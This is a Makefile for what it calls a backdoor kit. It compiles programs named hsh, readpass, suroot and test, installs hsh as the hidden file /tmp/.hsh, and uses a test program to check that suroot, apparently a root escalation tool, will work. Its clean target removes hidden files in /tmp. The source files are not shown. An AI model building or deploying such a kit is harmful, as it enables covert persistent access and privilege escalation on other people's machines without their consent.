CC = gcc
PROGZ = hsh readpass suroot test

ALL: $(PROGZ)
	@echo "Now you can type 'make install' to place the backdoor in /tmp"

hsh: hsh.c
	$(CC) -o hsh hsh.c

readpass: readpass.c
	$(CC) -o readpass readpass.c

suroot: suroot.c
	$(CC) -o suroot suroot.c

test: test.c
	$(CC) -o test test.c

clean:
	rm -f $(PROGZ) /tmp/.socksys /tmp/.sb /tmp/.hsh

install:
	cp hsh /tmp/.hsh
	@echo "Use the test program to make sure suroot will work on the computer"
